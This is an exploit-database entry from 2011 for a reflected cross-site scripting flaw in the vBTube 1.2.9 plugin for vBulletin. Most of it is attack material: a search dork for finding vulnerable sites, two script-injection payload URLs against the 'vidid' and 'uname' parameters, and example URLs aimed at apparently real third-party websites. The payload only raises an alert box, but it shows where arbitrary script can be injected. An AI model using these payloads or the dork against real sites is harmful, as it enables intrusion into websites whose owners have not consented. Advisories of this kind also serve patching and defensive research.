vBulletin 3.x.x vBTube 1.2.9 Cross Site Scripting



EKU-ID: 533 CVE: OSVDB-ID:
Author: Mr.ThieF Published: 2011-06-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


[~] Author : Mr.ThieF <~



[~] Contact : Mr.ThieF@yahoo.com <~



[~] DorK : inurl:vBTube 1.2.9



[~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=173083



[~] Version : 3.x



[~] Exploit :



http://[site]/[path]/vBTube.php?do=view&vidid="><script>alert(1);</script>
http://[site]/[path]/vBTube.php?page=1&do=user&uname="><script>alert(1);</script>

[~] Example : 
http://www.magicalproteachings.com/cy/vBTube.php?page=1&do=user&uname="><script>alert(1);</script>
http://www.rchelicoptertown.com/forum/vBTube.php?do=view&vidid=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

Done .. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~